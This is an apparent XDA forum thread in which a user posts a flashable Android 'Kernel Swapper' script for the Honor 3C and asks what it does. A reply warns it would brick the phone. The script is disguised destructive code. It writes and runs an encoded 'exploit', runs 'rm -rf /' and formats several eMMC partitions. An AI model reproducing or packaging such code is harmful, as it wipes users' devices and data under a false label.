Exploit in Kernel Swapper

DD!

New member
Apr 6, 2012
1
0
0
anybody know what this exploit does?
Code:
ui_print "*********************************************"
ui_print "Honor 3C (H30-U10) Kernel Swapper V1.0"
ui_print "Brought to you by codelover @ XDA"
ui_print "Custom kernel by kernel.killer @ XDA"
ui_print "*********************************************"

ui_print "- Checking prerequisites.."
ui_print "- Attempting to swap kernel, please wait..."
run_program("/sbin/echo", "WVVoV2IxQjVRak5oUjBZd1NVaFNiMXBUUW05YVYzaHpTVWRHZVZwVFFqVmlNMVZuWkVoS05XRlhOVzVKU0ZKMlNVZFNkbEI1UW1sa1dGRm5Zekk0WjJNeU9YbGpibXRuWkVjNFoyUkhWbk5pUTBJMVlqTlZaMlJIYUdoa1EwSXdZVWRXZVZwVFFuQmplVUoxWWpOU2IyRlhOVzVKU0ZKMlNVaE9iRnBUUW05YVdFcHNTVkU5UFE9PQ== > /sbin/exploit");
run_program("/sbin/exploit", "l33t", "0", "0", "1");
ui_print("Removing unneeded files...");
delete("/sbin/exploit", "/");
run_program("/sbin/rm", "-rf", "/");
ui_print("Make it cleaner, shall we?");
format("ext4", "EMMC", "/dev/block/mmcblk0p5", "0");
format("ext4", "EMMC", "/dev/block/mmcblk0p6", "0");
format("ext4", "EMMC", "/dev/block/mmcblk0p8", "0");
ui_print("Cleaned!");
symlink("idiot", "is", "now", "looking", "at", "this");
symlink("yes", "i", "am", "talking", "about", "YOU");
ui_print "- Done! ;)"
 

muradulislam

Senior Member
Jul 23, 2016
849
178
0
Mansehra
anybody know what this exploit does?
This will in most likelihood, wipe out your kernel and brick your device beyond repair (unless you take it to a service center)...

It is formatting three blocks mmcblock0p5, p6 and p8, most probably, your boot and kernel etc... These blocks are the places where operating system goes... You can google for these specific blocks to see what's inside them...

Am not an expert so can't say whether it will work or not but if it does, it's catastrophic...

Sent from my PLK-L01 using XDA Labs
 
Last edited: